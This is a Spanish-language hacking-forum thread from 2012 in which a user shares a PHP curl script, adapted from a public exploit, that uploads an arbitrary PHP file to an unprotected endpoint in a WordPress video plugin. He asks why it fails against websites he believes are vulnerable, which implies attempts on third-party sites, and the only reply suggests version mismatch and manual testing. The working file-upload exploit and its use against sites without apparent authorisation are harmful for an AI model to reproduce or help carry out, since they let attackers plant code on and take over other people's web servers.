elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Exploit PHP para wordpress
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Exploit PHP para wordpress  (Leído 2,880 veces)
TapIt

Desconectado Desconectado

Mensajes: 57



Ver Perfil
Exploit PHP para wordpress
« en: 11 Noviembre 2012, 15:13 pm »

Muy buenas, estoy intentando utilizar este exploit en PHP.
http://www.exploit-db.com/exploits/18990/

Lo he hecho de la siguiente forma:

He creado un archivo de nombre "exploit.php" al que le añadido este código y lo he subido a un servidor web.
Código:
<?php

$uploadfile="lo.php";
$ch =
curl_init("http://www.exemple.com/wordpress/wp-content/plugins/html5avmanager/lib/uploadify/custom.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Mi pregunta es:
Se supone que lo.php será el nombre del archivo que quiero subir al servidor. Para que el exploit lo encuentre lo he situado en la misma carpeta que está alojado el exploit.

¿Estoy haciendolo correctamente? He realizado varias pruebas en webs que deberían ser vulnerables pero no lo he conseguido.

Muchas gracias por adelantado. Saludos!!
En línea

Busca y encontrarás...
~ Yoya ~
Wiki

Desconectado Desconectado

Mensajes: 1.125



Ver Perfil
Re: Exploit PHP para wordpress
« Respuesta #1 en: 21 Noviembre 2012, 06:35 am »

Quizás la versiones del plugin de las web en la que haz probado no son vulnerables.

De cualquier forma, lo mejor que puedes hacer es intentarlo manualmente.

Saludos.
En línea

Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
El panel para poner negrita, etc... como en el wordpress
Desarrollo Web
dimitrix 3 4,253 Último mensaje 18 Agosto 2010, 11:33 am
por dimitrix
Configuración segura de Apache para WordPress
Desarrollo Web
el-brujo 0 2,584 Último mensaje 12 Julio 2011, 19:51 pm
por el-brujo
Sirve el WPScan para wordpress.com
Seguridad
navarro2010 1 2,914 Último mensaje 19 Enero 2013, 14:40 pm
por skapunky
Buscador para wordpress
Desarrollo Web
;c1v!c 0 1,654 Último mensaje 15 Abril 2014, 20:11 pm
por ;c1v!c
Exploit para wordpress
Bugs y Exploits
k4rv 2 7,346 Último mensaje 13 Abril 2018, 08:49 am
por k4rv
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines